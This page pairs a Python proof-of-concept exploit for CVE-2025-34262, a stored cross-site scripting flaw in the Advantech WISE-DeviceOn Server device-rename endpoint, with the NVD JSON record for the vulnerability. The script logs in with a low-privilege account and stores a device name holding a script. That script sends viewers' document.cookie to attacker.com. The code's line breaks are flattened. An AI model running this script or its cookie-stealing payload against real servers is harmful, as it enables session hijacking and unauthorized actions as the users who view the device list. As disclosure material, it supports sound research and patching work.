CVE-2025-34262

import requests import json # CVE-2025-34262 PoC - Advantech WISE-DeviceOn Server Stored XSS # Target: /rmm/v1/devices/name/{agent_id} TARGET_URL = "http://target-server.com" LOGIN_URL = f"{TARGET_URL}/rmm/v1/auth/login" XSS_PAYLOAD = '<script>document.location="http://attacker.com/steal?c="+document.cookie</script>' def exploit_stored_xss(username, password, agent_id): """Exploit stored XSS via device rename functionality""" # Step 1: Authenticate with low-privilege account session = requests.Session() login_data = { "username": username, "password": password } response = session.post(LOGIN_URL, json=login_data) if response.status_code != 200: print("[-] Authentication failed") return False # Step 2: Rename device with XSS payload rename_url = f"{TARGET_URL}/rmm/v1/devices/name/{agent_id}" rename_data = { "new_name": XSS_PAYLOAD } response = session.put(rename_url, json=rename_data) if response.status_code == 200: print("[+] XSS payload stored successfully") print(f"[+] Payload will execute when users view device list/details") return True else: print(f"[-] Failed to store payload: {response.status_code}") return False if __name__ == "__main__": # Replace with valid credentials and agent_id exploit_stored_xss("attacker_user", "password123", "agent_device_001")

{"cve": {"id": "CVE-2025-34262", "sourceIdentifier": "[email protected]", "published": "2025-12-05T18:15:55.983", "lastModified": "2025-12-17T17:15:49.550", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/devices/name/{agent_id} endpoint. When an authenticated user renames a device, the new_name value is stored and later rendered in device listings or detail views without proper HTML sanitation. An attacker can inject malicious script into the device name, which is then executed in the browser context of users who view or interact with the affected device, potentially enabling session compromise and unauthorized actions as the victim."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:advantech:wise-deviceon_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4", "matchCriteriaId": "BFB1F2C4-C260-473E-A6E1-EE7DFC3EF083"}]}]}], "references": [{"url": "https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn-20251208-2.pdf", "source": "[email protected]"}, {"url": "https://docs.deviceon.advantech.com/docs/resource/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-devices-name-agentid", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}